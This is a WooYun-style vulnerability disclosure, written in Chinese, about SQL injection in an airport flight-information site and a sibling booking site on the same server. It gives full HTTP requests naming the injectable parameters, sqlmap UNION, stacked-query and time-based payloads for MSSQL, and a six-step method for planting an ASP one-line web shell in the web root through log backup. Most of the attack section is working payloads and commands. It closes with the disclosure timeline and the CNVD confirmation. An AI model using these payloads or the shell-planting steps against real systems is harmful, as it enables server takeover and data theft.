乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-16: 细节已通知厂商并且等待厂商处理中 2014-05-21: 厂商已经确认,细节仅向厂商公开 2014-05-31: 细节向核心白帽子及相关领域专家公开 2014-06-10: 细节向普通白帽子公开 2014-06-20: 细节向实习白帽子公开 2014-06-30: 细节向公众公开
旁站还有一个购物站点 一并沦陷
注射点(f_*参数均存在注入):
POST /m/departures.aspx HTTP/1.0Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55Content-Length: 128Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)Host: www.xxia.comContent-Type: application/x-www-form-urlencodedReferer: http://www.xxia.com/m/departures.aspxf_txtFlightNumber=9876543210&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
sqlmap报告
---Place: POSTParameter: f_txtFlightNumber Type: UNION query Title: Generic UNION query (NULL) - 23 columns Payload: f_txtFlightNumber=9876543210' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(121)+CHAR(106)+CHAR(108)+CHAR(113)+CHAR(104)+CHAR(66)+CHAR(81)+CHAR(72)+CHAR(75)+CHAR(78)+CHAR(88)+CHAR(112)+CHAR(120)+CHAR(101)+CHAR(113)+CHAR(117)+CHAR(98)+CHAR(105)+CHAR(113)-- &f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: f_txtFlightNumber=9876543210'; WAITFOR DELAY '0:0:5'--&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: f_txtFlightNumber=9876543210' WAITFOR DELAY '0:0:5'--&f_txtTerminus=%E7%9B%AE%E7%9A%84%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0---[14:31:04] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008
GETSHELL方法:
日志差异备份 - 1.恢复当前库 注入点;alter database db_airport set RECOVERY FULL--+ 2.创建表cmd 注入点;create table cmd (a image)--+ 3.备份当前库到c:\sql.bak 注入点;backup log 当前库 to disk = 'c:\sql.bak' with init--+ 4.插入一句话代码到创建的表cmd 注入点;insert into cmd (a) values ('<%execute(request("a"))%>')--+ 5.备份一句话代码到站点根目录 注入点;backup log db_airport to disk = 'E:\wwwroot\website\104.asp'--+ 6.完成 注入点;drop table cmd--+
旁站购物站:http://booking.xxia.com/ 在同一个服务器其余注入:
POST /m/arrivals.aspx HTTP/1.0Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55Content-Length: 129Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)Host: www.xxia.comContent-Type: application/x-www-form-urlencodedReferer: http://www.xxia.com/m/arrivals.aspxf_txtFlightNumber=9876543210&f_txtDeparture=%E5%87%BA%E5%8F%91%E5%9C%B0&f_txtAirline=%E8%88%AA%E7%A9%BA%E5%85%AC%E5%8F%B8&x=0&y=0
Insert型:
POST /poll.aspx?q=submit HTTP/1.0Cookie: ASPSESSIONIDSQRRDCTD=IDFNMEAAKMLFOOMPBIBNIJIA; ASP.NET_SessionId=bwenolejqript345usfe1c55Content-Length: 649Accept: */*Host: www.xxia.comContent-Type: application/x-www-form-urlencodedReferer: http://www.xxia.com/poll.aspxAccept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; WOW64; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET4.0C; .NET4.0E; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)h_txt226=%E6%82%A8%E8%AE%A4%E4%B8%BA%E5%92%B8%E9%98%B3%E6%9C%BA%E5%9C%BA%E7%9B%AE%E5%89%8D%E6%9C%80%E9%9C%80%E6%8F%90%E5%8D%87%E7%9A%84%E6%9C%8D%E5%8A%A1%E6%98%AF%EF%BC%9A&txt226=1234&h_txt227=%E6%82%A8%E8%AE%A4%E4%B8%BA%E5%92%B8%E9%98%B3%E6%9C%BA%E5%9C%BA%E5%93%AA%E6%96%B9%E4%BE%BF%E6%9C%8D%E5%8A%A1%E8%AE%A9%E6%82%A8%E6%9C%80%E4%B8%BA%E8%AE%A4%E5%8F%AF%EF%BC%9A&txt227=1234&uname=&uemail=test%40altoromutual.com&uqq=1234&uphone=555-555-5555&item160=201&item60=61&item141=142&item153=165&item161=206&item81=82&item162=211&item111=112&item123=124&item135=136&item147=148&item159=195&item163=216&item63=64&item87=88&item156=180&item164=221&item72=73
参数cid:
GET /m/business.aspx?q=shoppinglist&cid=615
站点已经被别人上传有大马了,在web备份目录还可以找到另外服务器处于内网,与多个查询接口相连,被恶意利用后果可想而知
过滤
危害等级:高
漏洞Rank:11
确认时间:2014-05-21 14:30
CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心处置。
暂无